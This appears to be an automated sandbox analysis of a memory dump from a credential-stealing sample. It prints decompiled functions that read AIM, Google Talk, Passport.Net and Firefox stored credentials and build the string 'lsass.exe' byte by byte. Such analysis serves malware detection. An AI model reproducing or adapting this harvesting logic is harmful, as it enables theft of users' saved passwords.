Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
String ID: .cfg$General$WinPos
API String ID: 1012775001-3165880290
Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040260A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
memset.MSVCRT ref: 0040265A
memset.MSVCRT ref: 00402676
wcscpy.MSVCRT ref: 004026BD
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
RegCloseKey.ADVAPI32(?), ref: 00402724

Strings

Software\America Online\AIM6\Passwords, xrefs: 0040262E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$CloseEnumOpenValuewcscpy
String ID: Software\America Online\AIM6\Passwords
API String ID: 295685061-818317896
Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004039A8, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004039A8(void* __edi, intOrPtr* __esi) {
				void _v259;
				char _v260;
				char _v2088;
				void* _t40;
				void* _t44;
				void* _t47;
				intOrPtr* _t68;
				void* _t69;
				void* _t70;

				_t68 = __esi;
				_t70 = _t69 - 0x824;
				_t47 = 0;
				_push(0);
				_push(__edi + 0x728);
				_push("ShowGridLines");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x72c);
				_push("SaveFilterIndex");
				 *((intOrPtr*)( *__esi + 8))();
				_push(0);
				_push(__edi + 0x730);
				_push("AddExportHeaderLine");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x734);
				_push("MarkOddEvenRows");
				 *((intOrPtr*)( *__esi + 4))();
				E0040D725(E0040D339( &_v2088), 0);
				do {
					_v260 = 0;
					memset( &_v259, 0, 0xfe);
					_push(_t47);
					sprintf( &_v260, "Folder%d");
					_t70 = _t70 + 0x18;
					if( *((intOrPtr*)(_t68 + 4)) == 0) {
						L4:
						_t40 =  *((intOrPtr*)( *_t68 + 0x10))( &_v260, E0040D362(_t47), E0040D362(_t47), 0x104);
					} else {
						_t44 = E0040D362(_t47);
						0x413dce(_t44, E0040D362(_t47));
						if(_t44 != 0) {
							goto L4;
						} else {
							_t40 =  *((intOrPtr*)( *_t68 + 0x1c))( &_v260);
						}
					}
					_t47 = _t47 + 1;
				} while (_t47 < 7);
				return _t40;
			}

0x004039a8
0x004039ad
0x004039b4
0x004039b6
0x004039bd
0x004039be
0x004039c5
0x004039ca
0x004039d1
0x004039d2
0x004039d9
0x004039de
0x004039e5
0x004039e6
0x004039ed
0x004039f2
0x004039f9
0x004039fa
0x00403a01
0x00403a0f
0x00403a14
0x00403a22
0x00403a29
0x00403a2e
0x00403a3b
0x00403a40
0x00403a47
0x00403a7c
0x00403aa4
0x00403a49
0x00403a5b
0x00403a61
0x00403a6a
0x00000000
0x00403a6c
0x00403a77
0x00403a77
0x00403a6a
0x00403aa7
0x00403aa8
0x00403ab3

APIs

memset.MSVCRT ref: 00403A29
sprintf.MSVCRT ref: 00403A3B
_strcmpi.MSVCRT ref: 00403A61

Strings

ShowGridLines, xrefs: 004039BE
AddExportHeaderLine, xrefs: 004039E6
MarkOddEvenRows, xrefs: 004039FA
SaveFilterIndex, xrefs: 004039D2
Folder%d, xrefs: 00403A35

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _strcmpimemsetsprintf
String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
API String ID: 1148023869-3238971583
Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA34, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5

memset.MSVCRT ref: 0040FA77
strlen.MSVCRT ref: 0040FA8E
strlen.MSVCRT ref: 0040FA97
strlen.MSVCRT ref: 0040FAF0
strlen.MSVCRT ref: 0040FAFE

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

history.dat, xrefs: 0040FA61, 0040FA94, 0040FAA5
places.sqlite, xrefs: 0040FAF7, 0040FB0C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscatmemset$_mbscpy
String ID: history.dat$places.sqlite
API String ID: 29466866-467022611
Opcode ID: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
Opcode Fuzzy Hash: 6d4fa157046b79324614db1c5231b71ecc17b726e83c5fbb59575d794b89b698
Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004043E4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004043E4() {
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				void _v283;
				char _v284;
				void _v556;
				void* __edi;
				void* __esi;
				void _t33;
				char* _t42;
				char _t48;
				intOrPtr _t50;
				intOrPtr _t51;

				_v284 = 0;
				memset( &_v283, 0, 0x104);
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t48 =  *0x41e568; // 0x43
				asm("stosb");
				if(_t48 == 0) {
					 *0x41e670 = GetSystemDirectoryA(0x41e568, 0x104);
				}
				0x413d0c( &_v284, 0x41e568);
				E0040680E( &_v284);
				if(E004028E7() == 0) {
					_v11 = 0;
					_v18 = 0x61;
					_v15 = 0x2e;
					_v14 = 0x65;
					_v16 = 0x73;
					_v12 = 0x65;
					_v20 = 0x6c;
					_v17 = 0x73;
					_v19 = 0x73;
					_v13 = 0x78;
				}
				_t17 =  &_v20; // 0x6c
				_t42 =  &_v284;
				E00406EFE(_t42, _t17);
				0x411147();
				 *0x41e010 = 0; // executed
				0x411560(_t42);
				_t50 =  *0x41e010; // 0x0
				if(_t50 == 0) {
					L7:
					return 0;
				}
				memcpy( &_v556, 0x41df00, 0x10c);
				_t51 =  *0x41e010; // 0x0
				if(_t51 == 0) {
					goto L7;
				}
				_t33 = _v556;
				if(_t33 == 0) {
					goto L7;
				}
				return _t33;
			}

0x00404400
0x00404406
0x0040440d
0x00404413
0x00404414
0x00404415
0x00404416
0x0040441b
0x00404421
0x00404427
0x00404431
0x00404431
0x0040443e
0x0040444b
0x00404457
0x00404459
0x0040445c
0x00404460
0x00404464
0x00404468
0x0040446c
0x00404470
0x00404474
0x00404478
0x0040447c
0x0040447c
0x00404480
0x00404484
0x0040448a
0x00404490
0x00404498
0x0040449e
0x004044a3
0x004044aa
0x004044d7
0x00000000
0x004044d7
0x004044bd
0x004044c5
0x004044cb
0x00000000
0x00000000
0x004044cd
0x004044d5
0x00000000
0x00000000
0x004044dd

APIs

memset.MSVCRT ref: 00404406
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0040442B
_mbscpy.MSVCRT ref: 0040443E
memcpy.MSVCRT ref: 004044BD

Strings

lsass.exe, xrefs: 00404480, 00404483
C:\Windows\system32, xrefs: 0040441B, 00404422, 0040442A, 0040443C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: DirectorySystem_mbscpymemcpymemset
String ID: C:\Windows\system32$lsass.exe
API String ID: 3651535325-911417967
Opcode ID: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
Instruction ID: 0e5f66d5a96f37e034b058b5e8cd5d15c838e509caf2427c45d960fa31638fa3
Opcode Fuzzy Hash: 6d5ed3b0d0452b9c5b04e8167ed8392422c7da7f8cf5eefbc91479cdc521e7d4
Instruction Fuzzy Hash: 23213671C04298B9EB10DBB9EC057CEBF789B04308F0484BAD644A7191C7B98B88C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC4F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FC6B
memset.MSVCRT ref: 0040FC82

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826

_mbscat.MSVCRT ref: 0040FCAD

Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
Part of subcall function 0041223F: _mbscpy.MSVCRT ref: 0041230C

_mbscat.MSVCRT ref: 0040FCD5

Strings

Mozilla\Firefox\Profiles, xrefs: 0040FCCF
Mozilla\Profiles, xrefs: 0040FCA7

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 748118687-1174173950
Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041212C, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

RegCloseKey.KERNELBASE(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
_mbscat.MSVCRT ref: 00412188

Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

Strings

ProgramFilesDir, xrefs: 00412150
:\Program Files, xrefs: 0041217E
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseDirectoryOpenQueryValueWindows_mbscat
String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 3464146404-1099425022
Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D

Uniqueness

Uniqueness Score: -1.00%

Function 00414DF0, Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00414DE7), ref: 00414DF0
GetModuleHandleA.KERNEL32(?,00414DE7), ref: 00414E42
GetProcAddress.KERNEL32(00000000,00000000), ref: 00414E6A

Part of subcall function 00414E0D: GetProcAddress.KERNEL32(00000000,00414DFE), ref: 00414E0E
Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E20
Part of subcall function 00414E0D: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00414DFE,00414DE7), ref: 00414E34

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 25f2d81c04f4c45cc56d7cc0e98a54f4dee55ba3048ec5225fe48b17b8cda6c2
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 9101DB3058570179AB2166754C02AFBAF987AE3364F18074BB05497293CA5C89C683BD

Uniqueness

Uniqueness Score: -1.00%

Function 004085B9, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004085B9(void* __ecx, void* __eflags, int _a4) {
				char _v8;
				long _v4112;
				void* __esi;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char* _t46;
				int _t52;
				void* _t54;
				void* _t73;
				intOrPtr _t75;
				int _t78;
				struct HINSTANCE__** _t79;
				void* _t81;

				0x414060();
				_t73 = __ecx;
				E0040733E(__ecx + 4);
				_t78 = _a4;
				if(_t78 == 0) {
					L3:
					E0040821A(_t85, _t73); // executed
					_t79 = _t73 + 0x78;
					E00404D18(_t79);
					_t42 =  *((intOrPtr*)(_t79 + 4));
					if(_t42 == 0) {
						_t43 = 0;
						__eflags = 0;
					} else {
						_t43 =  *_t42( &_v8, 0, 0, 1, 0xf0000000); // executed
					}
					if(_t43 == 0) {
						L14:
						return _t43;
					} else {
						_a4 = 0;
						if( *((intOrPtr*)(_t73 + 0x20)) <= 0) {
							L12:
							_t75 = _v8;
							E00404D18(_t79);
							_t43 =  *((intOrPtr*)(_t79 + 8));
							if(_t43 != 0) {
								_t43 =  *_t43(_t75, 0);
							}
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t46 = E00407455(_a4, _t73 + 4);
							_v4112 = 0;
							MultiByteToWideChar(0, 0, _t46, 0xffffffff,  &_v4112, 0x800);
							0x413df8( &_v4112);
							E00408490(_t73, _v8,  &_v4112); // executed
							_t52 = wcslen( &_v4112);
							if(_t52 > 0) {
								_t54 = _t52 + _t52;
								if( *((short*)(_t81 + _t54 - 0x100e)) != 0x2f) {
									 *((short*)(_t81 + _t54 - 0x100c)) = 0x2f;
									 *((short*)(_t81 + _t54 - 0x100a)) = 0;
									E00408490(_t73, _v8,  &_v4112);
								}
							}
							_a4 = _a4 + 1;
						} while (_a4 <  *((intOrPtr*)(_t73 + 0x20)));
						goto L12;
					}
				}
				_a4 = 0;
				if( *((intOrPtr*)(_t78 + 0x1c)) <= 0) {
					goto L3;
				} else {
					goto L2;
				}
				do {
					L2:
					E00407407(_t73 + 4, E00407455(_a4, _t78));
					_a4 = _a4 + 1;
					_t85 = _a4 -  *((intOrPtr*)(_t78 + 0x1c));
				} while (_a4 <  *((intOrPtr*)(_t78 + 0x1c)));
				goto L3;
			}

0x004085c1
0x004085c9
0x004085ce
0x004085d3
0x004085da
0x00408602
0x00408603
0x00408608
0x0040860b
0x00408610
0x00408615
0x00408628
0x00408628
0x00408617
0x00408624
0x00408624
0x0040862c
0x004086e6
0x004086ea
0x00408632
0x00408635
0x00408638
0x004086d3
0x004086d3
0x004086d6
0x004086db
0x004086e0
0x004086e4
0x004086e4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040863e
0x0040863e
0x00408644
0x0040865a
0x00408661
0x0040866e
0x0040867f
0x0040868b
0x00408693
0x00408695
0x004086a0
0x004086a2
0x004086ac
0x004086bf
0x004086bf
0x004086a0
0x004086c4
0x004086ca
0x00000000
0x0040863e
0x0040862c
0x004085df
0x004085e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004085e4
0x004085e4
0x004085f2
0x004085f7
0x004085fd
0x004085fd
0x00000000

APIs

Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
_wcslwr.MSVCRT ref: 0040866E
wcslen.MSVCRT ref: 0040868B

Strings

/, xrefs: 00408697
/, xrefs: 004086A2

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$ByteCharMultiWide_wcslwrwcslen
String ID: /$/
API String ID: 2365529402-2523464752
Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF88, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,7614F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7614F420), ref: 0040FFCF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D

Strings

Passport.Net\*, xrefs: 0040FFCA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$ByteCharLibraryLoadMultiWide$CredFreeLocalRead
String ID: Passport.Net\*
API String ID: 3146130701-3671122194
Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407F7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
registryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407F7E(signed int _a4) {
				void* _v12;
				int _v16;
				void* _v20;
				void _v279;
				char _v280;
				void _v4375;
				int _v4376;
				long _t26;
				char* _t29;
				int _t31;
				void* _t39;
				void* _t44;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				0x414060();
				E00407C79(_a4); // executed
				_t26 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Talk\Accounts", _t26, _t44, _t39);
				_t49 = _t48 + 0xc;
				if(_t26 == 0) {
					_v16 = 0;
					_v280 = 0;
					memset( &_v279, 0, 0xff);
					_t50 = _t49 + 0xc;
					_t29 =  &_v280;
					0x411dee(_v12, 0, _t29);
					while(1) {
						_t51 = _t50 + 0xc;
						if(_t29 != 0) {
							break;
						}
						_t31 =  &_v280;
						0x411d68(_v12, _t31,  &_v20);
						_t50 = _t51 + 0xc;
						if(_t31 == 0) {
							_v4376 = _t31;
							memset( &_v4375, _t31, 0xfff);
							_t50 = _t50 + 0xc;
							0x411d82(_v20, 0x418304);
							E00407E33(_a4,  &_v280,  &_v4376);
							RegCloseKey(_v20);
						}
						_v16 = _v16 + 1;
						_t29 =  &_v280;
						0x411dee(_v12, _v16, _t29);
					}
					_t26 = RegCloseKey(_v12);
				}
				return _t26;
			}

0x00407f86
0x00407f90
0x00407f95
0x00407fa3
0x00407fa8
0x00407fad
0x00407fc2
0x00407fc5
0x00407fcc
0x00407fd1
0x00407fd4
0x00407fdf
0x00408067
0x00408067
0x0040806c
0x00000000
0x00000000
0x00407ff0
0x00407ffa
0x00407fff
0x00408004
0x0040800c
0x00408019
0x0040801e
0x00408034
0x00408048
0x00408050
0x00408050
0x00408052
0x00408055
0x00408062
0x00408062
0x00408075
0x00408075
0x0040807a

APIs

Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00407FCC

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

memset.MSVCRT ref: 00408019
RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075

Strings

Software\Google\Google Talk\Accounts, xrefs: 00407F99

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
String ID: Software\Google\Google Talk\Accounts
API String ID: 2959138223-1079885057
Opcode ID: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
Opcode Fuzzy Hash: 49074e8cae0c663ec28b6a12e2b781a56f038b486158cb3c34e9b0dfdaa3d0c9
Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041223F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
memset.MSVCRT ref: 00412297
RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
_mbscpy.MSVCRT ref: 0041230C

Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 3929982141-2036018995
Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C427, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040C427(void* __eax, intOrPtr* __ebx) {
				void* __edi;
				void* __esi;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				struct HICON__* _t23;
				intOrPtr* _t30;
				void* _t32;
				intOrPtr* _t35;

				_t30 = __ebx;
				 *((intOrPtr*)(__ebx + 0x140)) = 0;
				 *__ebx = 0x418778;
				 *((intOrPtr*)(__ebx + 0x388)) = 0;
				 *((intOrPtr*)(__ebx + 0x394)) = 0;
				0x413d5c(0x738);
				if(__eax == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E0040D339(__eax);
					 *0x41e15c = _t19;
				}
				 *((intOrPtr*)(_t30 + 0x38c)) = _t19;
				0x413d5c(); // executed
				_t35 = _t19;
				_t40 = _t35;
				_t32 = 0x8fc;
				if(_t35 == 0) {
					_t35 = 0;
					__eflags = 0;
				} else {
					E004092CC(_t35, _t40);
					_t5 = _t35 + 0x1cc; // 0x1cc
					_t6 = _t5 + 8; // 0x1d4
					 *_t35 = 0x417eb8;
					E0040D339(_t6);
					 *_t5 = 0x417f40;
					 *(_t35 + 0x1c8) =  *(_t35 + 0x1c8) | 0xffffffff;
				}
				 *((intOrPtr*)(_t30 + 0x390)) = _t35;
				_t20 =  *(_t30 + 0x388);
				if(_t20 != 0) {
					DeleteObject(_t20);
					 *(_t30 + 0x388) = 0;
				}
				_t21 = E00406AE0(); // executed
				 *(_t30 + 0x388) = _t21;
				E00401000(_t32, _t30 + 0x285, 0x418678);
				 *((intOrPtr*)(_t30 + 0x174)) = 0;
